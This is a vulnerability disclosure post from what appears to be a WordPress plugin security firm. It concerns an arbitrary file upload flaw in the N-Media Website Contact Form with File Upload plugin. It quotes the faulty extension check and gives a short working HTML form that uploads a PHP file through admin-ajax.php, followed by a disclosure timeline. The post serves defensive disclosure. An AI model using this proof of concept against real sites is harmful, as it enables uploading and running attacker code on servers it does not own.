19 Sep

Arbitrary File Upload Vulnerability in N-Media Website Contact Form with File Upload

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three other shared same the same vulnerable code. One of those is N-Media Website Contact Form with File Upload.

In the case of this plugin, we found that we had already had a listing for a very similar looking vulnerability for the plugin already in our dataset. Our first thought was that we had mistakenly marked that one as being fixed when we added it to our data and the vulnerability had never been fixed, but a closer looked showed what had happened. After the previously issue was discovered the following code was added to restrict .php files being uploaded:

/* ========== Invalid File type checking ========== */
$file_type = wp_check_filetype($_FILES ['Filedata'] ['name'], null );
$allowed_types = array('php', 'exe');
if( in_array($file_type['ext'], $allowed_types) ){
	$response ['status'] = 'error';
	$response ['message'] = __ ( 'File type not valid - '.$file_type, 'nm-filemanager' );
	die ( json_encode($response) );
/* ========== Invalid File type checking ========== */

At the time you had set the name of the file input to be uploaded as “Filedata” for the upload to work. The code above checks the input with that name for extensions that are not allowed. In version 1.9, the code was changed so the file input needs to be name “file” instead of “Filedata”, but the code checking the extension was not changed as well.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/contact_files/ as upload.php.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />


  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 9/19/2016 – WordPress.org Plugin Directory notified.
  • 9/21/2016 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *